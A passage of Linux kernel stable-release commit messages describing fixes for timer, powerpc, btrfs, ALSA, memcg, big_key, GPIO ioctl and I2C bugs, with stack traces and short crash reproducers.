up in bucket 0, which is correct as it takes 63 ticks to advance base->clk
to index into bucket 0 again.
If the cpu goes idle before jiffies advance, then the bug in the forwarding
mechanism sets base->clk back to 0, so the next invocation of run_timers()
at the next tick will index into bucket 0 and therefore expire the timer 62
ticks too early.
Instead of blindly setting base->clk to jiffies we must make the forwarding
conditional on jiffies > base->clk, but we cannot use jiffies for this as
we might run into the following issue:
if (time_after(jiffies, base->clk) {
if (time_after(nextevt, base->clk))
base->clk = jiffies;
jiffies can increment between the check and the assigment far enough to
advance beyond nextevt. So we need to use a stable value for checking.
get_next_timer_interrupt() has the basej argument which is the jiffies
value snapshot taken in the calling code. So we can just that.
Thanks to Ashton for bisecting and providing trace data!
Fixes: a683f390b9 ("timers: Forward the wheel clock whenever possible")
Reported-by: Ashton Holmes <scoopta@gmail.com>
Reported-by: Michael Thayer <michael.thayer@oracle.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Michal Necasek <michal.necasek@oracle.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: knut.osmundsen@oracle.com
Cc: stern@rowland.harvard.edu
Cc: rt@linutronix.de
Link: http://lkml.kernel.org/r/20161022110552.175308322@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 09b7e37b18 upstream.
This fixes a race condition where one thread that is entering or
leaving a power-saving state can inadvertently ignore the lock bit
that was set by another thread, and potentially also clear it.
The core_idle_lock_held function is called when the lock bit is
seen to be set. It polls the lock bit until it is clear, then
does a lwarx to load the word containing the lock bit and thread
idle bits so it can be updated. However, it is possible that the
value loaded with the lwarx has the lock bit set, even though an
immediately preceding lwz loaded a value with the lock bit clear.
If this happens then we go ahead and update the word despite the
lock bit being set, and when called from pnv_enter_arch207_idle_mode,
we will subsequently clear the lock bit.
No identifiable misbehaviour has been attributed to this race.
This fixes it by checking the lock bit in the value loaded by the
lwarx. If it is set then we just go back and keep on polling.
Fixes: b32aadc1a8 ("powerpc/powernv: Fix race in updating core_idle_state")
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 56c46222af upstream.
Commit 8117ac6a6c ("powerpc/powernv: Switch off MMU before entering
nap/sleep/rvwinkle mode", 2014-12-10) fixed a race condition where one
thread entering a KVM guest could switch the MMU context to the guest
while another thread was still in host kernel context with the MMU on.
That commit moved the point where a thread entering a power-saving
mode set its kvm_hstate.hwthread_state field in its PACA to
KVM_HWTHREAD_IN_IDLE from a point where the MMU was on to after the
MMU had been switched off. That commit also added a comment
explaining that we have to switch to real mode before setting
hwthread_state to avoid this race.
Nevertheless, commit 4eae2c9ae5 ("powerpc/powernv: Make
pnv_powersave_common more generic", 2016-07-08) subsequently moved
the setting of hwthread_state back to a point where the MMU is on,
thus reintroducing the race, despite the comment saying that this
should not be done being included in full in the context lines of
the patch that did it.
This fixes the race again and adds a bigger and shoutier comment
explaining the potential race condition.
Fixes: 4eae2c9ae5 ("powerpc/powernv: Make pnv_powersave_common more generic")
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Reviewed-by: Shreyas B. Prabhu <shreyasbp@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd77c44986 upstream.
Before this patch, we used tlbiel, if we ever ran only on this core.
That was mostly derived from the nohash usage of the same. But is
incorrect, the ISA 3.0 clarifies tlbiel such that:
"All TLB entries that have all of the following properties are made
invalid on the thread executing the tlbiel instruction"
ie. tlbiel only invalidates TLB entries on the current thread. So if the
mm has been used on any other thread (aka. cpu) then we must broadcast
the invalidate.
This bug could lead to invalid TLB entries if a program runs on multiple
threads of a core.
Hence use tlbiel, if we only ever ran on only the current cpu.
Fixes: 1a472c9dba ("powerpc/mm/radix: Add tlbflush routines")
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80f23935ca upstream.
PowerPC's "cmp" instruction has four operands. Normally people write
"cmpw" or "cmpd" for the second cmp operand 0 or 1. But, frequently
people forget, and write "cmp" with just three operands.
With older binutils this is silently accepted as if this was "cmpw",
while often "cmpd" is wanted. With newer binutils GAS will complain
about this for 64-bit code. For 32-bit code it still silently assumes
"cmpw" is what is meant.
In this instance the code comes directly from ISA v2.07, including the
cmp, but cmpd is correct. Backport to stable so that new toolchains can
build old kernels.
Fixes: 948cf67c47 ("powerpc: Add NAP mode support on Power7 in HV mode")
Reviewed-by: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Segher Boessenkool <segher@kernel.crashing.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 570dd45042 upstream.
btrfs_remove_all_log_ctxs takes a shortcut where it avoids walking the
list because it knows all of the waiters are patiently waiting for the
commit to finish.
But, there's a small race where btrfs_sync_log can remove itself from
the list if it finds a log commit is already done. Also, it uses
list_del_init() to remove itself from the list, but there's no way to
know if btrfs_remove_all_log_ctxs has already run, so we don't know for
sure if it is safe to call list_del_init().
This gets rid of all the shortcuts for btrfs_remove_all_log_ctxs(), and
just calls it with the proper locking.
This is part two of the corruption fixed by cbd60aa7cd. I should have
done this in the first place, but convinced myself the optimizations were
safe. A 12 hour run of dbench 2048 will eventually trigger a list debug
WARN_ON for the list_del_init() in btrfs_sync_log().
Fixes: d1433debe7
Reported-by: Dave Jones <davej@codemonkey.org.uk>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a05b82d514 upstream.
In some error paths in functions cxl_start_context and
afu_ioctl_start_work pid references to the current & group-leader tasks
can leak after they are taken. This patch fixes these error paths to
release these pid references before exiting the error path.
Fixes: 7b8ad495d5 ("cxl: Fix DSI misses when the context owning task exits")
Reviewed-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Reported-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Signed-off-by: Vaibhav Jain <vaibhav@linux.vnet.ibm.com>
Acked-by: Frederic Barrat <fbarrat@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0a3ffab93f upstream.
Prevent using a binder_ref with only weak references where a strong
reference is required.
Signed-off-by: Arve Hjønnevåg <arve@android.com>
Signed-off-by: Martijn Coenen <maco@android.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6aecd87158 upstream.
They uses the codec ALC255, and have the different pin cfg definition
from the ones in the existing pin quirk table. Now adding them into
the table to fix the problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1a3f099101 upstream.
ASRock B150M Pro4/D3 mobo with ALC892 codec doesn't seem to provide
proper pins for the surround outputs, hence we need to specify the
pincfgs manually with a couple of other corrections.
Reported-and-tested-by: Benjamin Valentin <benpicco@googlemail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f771d5bb71 upstream.
We have a new Dell laptop model which uses ALC295, the pin definition
is different from the existing ones in the pin quirk table, to fix the
headset mic detection and mic mute led's problem, we need to add the
new pin defintion into the pin quirk table.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3ab7511eaf upstream.
Commit 49d9e77e72 ("ALSA: hda - Fix system panic when DMA > 40 bits
for Nvidia audio controllers") simply disabled any DMA exceeding 32
bits for NVidia devices, even though they are capable of performing
DMA up to 40 bits. On some architectures (such as arm64), system memory
is not guaranteed to be 32-bit addressable by PCI devices, and so this
change prevents NVidia devices from working on platforms such as AMD
Seattle.
Since the original commit already mentioned that up to 40 bits of DMA
is supported, and given that the code has been updated in the meantime
to support a 40 bit DMA mask on other devices, revert commit 49d9e77e72
and explicitly set the DMA mask to 40 bits for NVidia devices.
Fixes: 49d9e77e72 ('ALSA: hda - Fix system panic when DMA > 40 bits...')
Signed-off-by: Ard Biesheuvel <ard.biesheuvel@linaro.org>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9b50898ad9 upstream.
The recent rewrite of the sequencer time accounting using timespec64
in the commit [3915bf2946: ALSA: seq_timer: use monotonic times
internally] introduced a bad regression. Namely, the time reported
back doesn't increase but goes back and forth.
The culprit was obvious: the delta is stored to the result (cur_time =
delta), instead of adding the delta (cur_time += delta)!
Let's fix it.
Fixes: 3915bf2946 ('ALSA: seq_timer: use monotonic times internally')
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=177571
Reported-by: Yves Guillemot <yc.guillemot@wanadoo.fr>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 52e73eb287 upstream.
We need to wait until the percpu_ref is released before exit. Otherwise,
we sometimes lose the race and trigger this new warning that was added
in v4.9 (commit a67823c1ed "percpu-refcount: init ->confirm_switch
member properly"):
WARNING: CPU: 0 PID: 3629 at lib/percpu-refcount.c:107 percpu_ref_exit+0x51/0x60
[..]
Call Trace:
[<ffffffff814bf093>] dump_stack+0x85/0xc2
[<ffffffff810b15db>] __warn+0xcb/0xf0
[<ffffffff810b170d>] warn_slowpath_null+0x1d/0x20
[<ffffffff814d70c1>] percpu_ref_exit+0x51/0x60
[<ffffffffa005706a>] dax_pmem_percpu_exit+0x1a/0x50 [dax_pmem]
[<ffffffff81615f1f>] devm_action_release+0xf/0x20
Fixes: ab68f26221 ("/dev/dax, pmem: direct access to persistent memory")
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 31e6ec4519 upstream.
Since BIG_KEYS can't be compiled as module it requires one of the "stdrng"
providers to be compiled into kernel. Otherwise big_key_crypto_init() fails
on crypto_alloc_rng step and next dereference of big_key_skcipher (e.g. in
big_key_preparse()) results in a NULL pointer dereference.
Fixes: 13100a72f4 ('Security: Keys: Big keys stored encrypted')
Signed-off-by: Artem Savkov <asavkov@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Stephan Mueller <smueller@chronox.de>
cc: Kirill Marinushkin <k.marinushkin@gmail.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7df3e59c3d upstream.
big_key has two separate initialisation functions, one that registers the
key type and one that registers the crypto. If the key type fails to
register, there's no problem if the crypto registers successfully because
there's no way to reach the crypto except through the key type.
However, if the key type registers successfully but the crypto does not,
big_key_rng and big_key_blkcipher may end up set to NULL - but the code
neither checks for this nor unregisters the big key key type.
Furthermore, since the key type is registered before the crypto, it is
theoretically possible for the kernel to try adding a big_key before the
crypto is set up, leading to the same effect.
Fix this by merging big_key_crypto_init() and big_key_init() and calling
the resulting function late. If they're going to be encrypted, we
shouldn't be creating big_keys before we have the facilities to do the
encryption available. The key type registration is also moved after the
crypto initialisation.
The fix also includes message printing on failure.
If the big_key type isn't correctly set up, simply doing:
dd if=/dev/zero bs=4096 count=1 | keyctl padd big_key a @s
ought to cause an oops.
Fixes: 13100a72f4 ('Security: Keys: Big keys stored encrypted')
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Peter Hlavaty <zer0mem@yahoo.com>
cc: Kirill Marinushkin <k.marinushkin@gmail.com>
cc: Artem Savkov <asavkov@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 03dab869b7 upstream.
This fixes CVE-2016-7042.
Fix a short sprintf buffer in proc_keys_show(). If the gcc stack protector
is turned on, this can cause a panic due to stack corruption.
The problem is that xbuf[] is not big enough to hold a 64-bit timeout
rendered as weeks:
(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
$2 = 30500568904943
That's 14 chars plus NUL, not 11 chars plus NUL.
Expand the buffer to 16 chars.
I think the unpatched code apparently works if the stack-protector is not
enabled because on a 32-bit machine the buffer won't be overflowed and on a
64-bit machine there's a 64-bit aligned pointer at one side and an int that
isn't checked again on the other side.
The panic incurred looks something like:
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe
CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
Call Trace:
[<ffffffff813d941f>] dump_stack+0x63/0x84
[<ffffffff811b2cb6>] panic+0xde/0x22a
[<ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
[<ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
[<ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
[<ffffffff81350410>] ? key_validate+0x50/0x50
[<ffffffff8134db30>] ? key_default_cmp+0x20/0x20
[<ffffffff8126b31c>] seq_read+0x2cc/0x390
[<ffffffff812b6b12>] proc_reg_read+0x42/0x70
[<ffffffff81244fc7>] __vfs_read+0x37/0x150
[<ffffffff81357020>] ? security_file_permission+0xa0/0xc0
[<ffffffff81246156>] vfs_read+0x96/0x130
[<ffffffff81247635>] SyS_read+0x55/0xc0
[<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
Reported-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: Ondrej Kozina <okozina@redhat.com>
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3105f234e0 upstream.
Initial logic for checking CPU match resulted in OR of CPU features
rather than the intended AND.
Updated to use boot_cpu_has macro rather than x86_match_cpu.
In addition, MWAIT is the only required CPU feature for idle
injection to work. Drop other feature requirements since they are
only needed for optimal efficiency.
Signed-off-by: Eric Ernst <eric.ernst@linux.intel.com>
Acked-by: Jacob Pan <jacob.jun.pan@linux.intel.com>
Signed-off-by: Zhang Rui <rui.zhang@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 89a2848381 upstream.
On 4.0, we saw a stack corruption from a page fault entering direct
memory cgroup reclaim, calling into btrfs_releasepage(), which then
tried to allocate an extent and recursed back into a kmem charge ad
nauseam:
[...]
btrfs_releasepage+0x2c/0x30
try_to_release_page+0x32/0x50
shrink_page_list+0x6da/0x7a0
shrink_inactive_list+0x1e5/0x510
shrink_lruvec+0x605/0x7f0
shrink_zone+0xee/0x320
do_try_to_free_pages+0x174/0x440
try_to_free_mem_cgroup_pages+0xa7/0x130
try_charge+0x17b/0x830
memcg_charge_kmem+0x40/0x80
new_slab+0x2d9/0x5a0
__slab_alloc+0x2fd/0x44f
kmem_cache_alloc+0x193/0x1e0
alloc_extent_state+0x21/0xc0
__clear_extent_bit+0x2b5/0x400
try_release_extent_mapping+0x1a3/0x220
__btrfs_releasepage+0x31/0x70
btrfs_releasepage+0x2c/0x30
try_to_release_page+0x32/0x50
shrink_page_list+0x6da/0x7a0
shrink_inactive_list+0x1e5/0x510
shrink_lruvec+0x605/0x7f0
shrink_zone+0xee/0x320
do_try_to_free_pages+0x174/0x440
try_to_free_mem_cgroup_pages+0xa7/0x130
try_charge+0x17b/0x830
mem_cgroup_try_charge+0x65/0x1c0
handle_mm_fault+0x117f/0x1510
__do_page_fault+0x177/0x420
do_page_fault+0xc/0x10
page_fault+0x22/0x30
On later kernels, kmem charging is opt-in rather than opt-out, and that
particular kmem allocation in btrfs_releasepage() is no longer being
charged and won't recurse and overrun the stack anymore.
But it's not impossible for an accounted allocation to happen from the
memcg direct reclaim context, and we needed to reproduce this crash many
times before we even got a useful stack trace out of it.
Like other direct reclaimers, mark tasks in memcg reclaim PF_MEMALLOC to
avoid recursing into any other form of direct reclaim. Then let
recursive charges from PF_MEMALLOC contexts bypass the cgroup limit.
Link: http://lkml.kernel.org/r/20161025141050.GA13019@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Michal Hocko <mhocko@suse.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Tejun Heo <tj@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1bc11d70b5 upstream.
As described in https://bugzilla.kernel.org/show_bug.cgi?id=177821:
After some analysis it seems to be that the problem is in alloc_super().
In case list_lru_init_memcg() fails it goes into destroy_super(), which
calls list_lru_destroy().
And in list_lru_init() we see that in case memcg_init_list_lru() fails,
lru->node is freed, but not set NULL, which then leads list_lru_destroy()
to believe it is initialized and call memcg_destroy_list_lru().
memcg_destroy_list_lru() in turn can access lru->node[i].memcg_lrus,
which is NULL.
[akpm@linux-foundation.org: add comment]
Signed-off-by: Alexander Polakov <apolyakov@beget.ru>
Acked-by: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 58d7896785 upstream.
The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks. The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Reviewed-by: Eric Sandeen <sandeen@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 953b956a2e upstream.
When allocating a new line handle or event a file is allocated that it is
associated to. The file is attached to a file descriptor of the current
process and the file descriptor is returned to userspace using
copy_to_user(). If this copy operation fails the line handle or event
allocation is aborted, all acquired resources are freed and an error is
returned.
But the file struct is not freed and left attached to the userspace
application and even though the file descriptor number was not copied it is
trivial to guess. If a userspace application performs a IOCTL on such a
left over file descriptor it will trigger a use-after-free and if the file
descriptor is closed (latest when the application exits) a double-free is
triggered.
anon_inode_getfd() performs 3 tasks, allocate a file struct, allocate a
file descriptor for the current process and install the file struct in the
file descriptor. As soon as the file struct is installed in the file
descriptor it is accessible by userspace (even if the IOCTL itself hasn't
completed yet), this means uninstalling the fd on the error path is not an
option, since userspace might already got a reference to the file.
Instead anon_inode_getfd() needs to be broken into its individual steps.
The allocation of the file struct and file descriptor is done first, then
the copy_to_user() is executed and only if it succeeds the file is
installed.
Since the file struct is reference counted it can not be just freed, but
its reference needs to be dropped, which will also call the release()
callback, which will free the state attached to the file. So in this case
the normal error cleanup path should not be taken.
Fixes: d932cd4918 ("gpio: free handles in fringe cases")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d82aa4a8f2 upstream.
The GPIOHANDLE_GET_LINE_VALUES_IOCTL handler allocates a gpiohandle_data
struct on the stack and then passes it to copy_to_user(). But only the
first element of the values array in the struct is set, which leaves the
struct partially initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
Cc: stable@vger.kernel.org
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac7dbb991e upstream.
The GPIO_GET_LINEEVENT_IOCTL currently ignores unknown or undefined
linehandle and lineevent flags. From a backwards and forwards compatibility
viewpoint it is highly desirable to reject unknown flags though.
On one hand an application that is using newer flags and is running on
an older kernel has no way to detect if the new flags were handled
correctly if they are silently discarded.
On the other hand an application that (accidentally) passes undefined flags
will run fine on an older kernel, but may break on a newer kernel when
these flags get defined.
Ensure that requests that have undefined flags set are rejected with an
error, rather than silently discarding the undefined flags.
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3e847c7f1 upstream.
The GPIO_GET_LINEHANDLE_IOCTL currently ignores unknown or undefined
linehandle flags. From a backwards and forwards compatibility viewpoint it
is highly desirable to reject unknown flags though.
On one hand an application that is using newer flags and is running on
an older kernel has no way to detect if the new flags were handled
correctly if they are silently discarded.
On the other hand an application that (accidentally) passes undefined flags
will run fine on an older kernel, but may break on a newer kernel when
these flags get defined.
Ensure that requests that have undefined flags set are rejected with an
error, rather than silently discarding the undefined flags.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b8b0e3d303 upstream.
The line offset that is used as an index into the descs array is provided
by userspace and might go beyond the bounds of the array. If that happens
undefined behavior will occur.
Make sure that the offset is within the bounds of the desc array and reject
any requests that specify a value outside of it.
Fixes: 61f922db72 ("gpio: userspace ABI for reading GPIO line events")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3eded5d83b upstream.
The GPIOHANDLE_GET_LINE_VALUES_IOCTL handler allocates a gpiohandle_data
struct on the stack and then passes it to copy_to_user(). But depending on
the number of requested line handles the struct is only partially
initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e405f9fcb6 upstream.
The line offset that is used as an index into the descs array is provided
by userspace and might go beyond the bounds of the array. If that happens
undefined behavior will occur.
Make sure that the offset is within the bounds of the desc array and reject
any requests that specify a value outside of it.
Fixes: d7c51b47ac ("gpio: userspace ABI for reading/writing GPIO lines")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0f4bbb2337 upstream.
The GPIO_GET_CHIPINFO_IOCTL handler allocates a gpiochip_info struct on the
stack and then passes it to copy_to_user(). But depending on the length of
the GPIO chip name and label the struct is only partially initialized.
This exposes the previous, potentially sensitive, stack content to the
issuing userspace application. To avoid this make sure that the struct is
fully initialized.
Fixes: 521a2ad6f8 ("gpio: add userspace ABI for GPIO line information")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1f1cc4566b upstream.
The current line offset validation is off by one. Depending on the data
stored behind the descs array this can either cause undefined behavior or
disclose arbitrary, potentially sensitive, memory to the issuing userspace
application.
Make sure that offset is within the bounds of the desc array.
Fixes: 521a2ad6f8 ("gpio: add userspace ABI for GPIO line information")
Signed-off-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 67bf5156ed upstream.
acpi_dev_gpio_irq_get() currently ignores the error returned
by acpi_get_gpiod_by_index() and overwrites it with -ENOENT.
Problem is this error can be -EPROBE_DEFER, which just blows
up some drivers when the module ordering is not correct.
Signed-off-by: David Arcari <darcari@redhat.com>
Signed-off-by: Benjamin Tissoires <benjamin.tissoires@redhat.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0af98a7e0 upstream.
Instantiated SPI device nodes are marked with OF_POPULATE. This was
introduced in bd6c164. On unloading, loaded device nodes will of course
be unmarked. The problem are nodes that fail during initialisation: If a
node fails, it won't be unloaded and hence not be unmarked.
If a SPI driver module is unloaded and reloaded, it will skip nodes that
failed before.
Skip device nodes that are already populated and mark them only in case
of success.
Note that the same issue exists for I2C.
Fixes: bd6c164 ("spi: Mark instantiated device nodes with OF_POPULATE")
Signed-off-by: Ralf Ramsauer <ralf@ramses-pyramidenbau.de>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Acked-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5c0ba57744 upstream.
When we get a spurious interrupt in fsl_espi_irq, we end up
processing four uninitalized bytes of data, as shown in this
warning message:
drivers/spi/spi-fsl-espi.c: In function 'fsl_espi_irq':
drivers/spi/spi-fsl-espi.c:462:4: warning: 'rx_data' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds another check so we skip the data in this case.
Fixes: 6319a68011 ("spi/fsl-espi: avoid infinite loops on fsl_espi_cpu_irq()")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 36e3fa6a38 upstream.
The i2c adapter is only relevant for some peer device types, so
let's clear the pdt if it's still the same as the old_pdt when we
tear down the i2c adapter.
I don't really like this design pattern of updating port->whatever
before doing the accompanying changes and passing around old_whatever
to figure stuff out. Would make much more sense to me to the pass the
new value around and only update the port->whatever when things are
consistent. But let's try to work with what we have right now.
Quoting a follow-up from Ville:
"And naturally I forgot to amend the commit message w.r.t. this guy
[the change in drm_dp_destroy_port]. We don't really need to do this
here, but I figured I'd try to be a bit more consistent by having it,
just to avoid accidental mistakes if/when someone changes this stuff
again later."
v2: Clear port->pdt in the caller, if needed (Daniel)
Cc: Daniel Vetter <daniel@ffwll.ch>
Cc: Carlos Santa <carlos.santa@intel.com>
Cc: Kirill A. Shutemov <kirill@shutemov.name>
Tested-by: Carlos Santa <carlos.santa@intel.com>
Tested-by: Kirill A. Shutemov <kirill@shutemov.name>
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97666
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/1477488633-16544-1-git-send-email-ville.syrjala@linux.intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 147b36d5b7 upstream.
Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.
The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:
i2c_register_driver() i2c_del_adapter()
driver_register() ...
bus_add_driver() ...
... bus_for_each_drv(..., __process_removed_adapter)
... i2c_do_del_adapter()
... list_for_each_entry_safe(..., &driver->clients, ...)
INIT_LIST_HEAD(&driver->clients);
To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().
The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitraty I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:
% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
Unable to handle kernel NULL pointer dereference at virtual address 00000000
Internal error: Oops: 17 [#1] SMP ARM
CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
task: e5ada400 task.stack: e4936000
PC is at i2c_do_del_adapter+0x20/0xcc
LR is at __process_removed_adapter+0x14/0x1c
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none
Control: 10c5387d Table: 35bd004a DAC: 00000051
Process sh (pid: 533, stack limit = 0xe4936210)
Stack: (0xe4937d28 to 0xe4938000)
Backtrace:
[<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
[<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
[<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
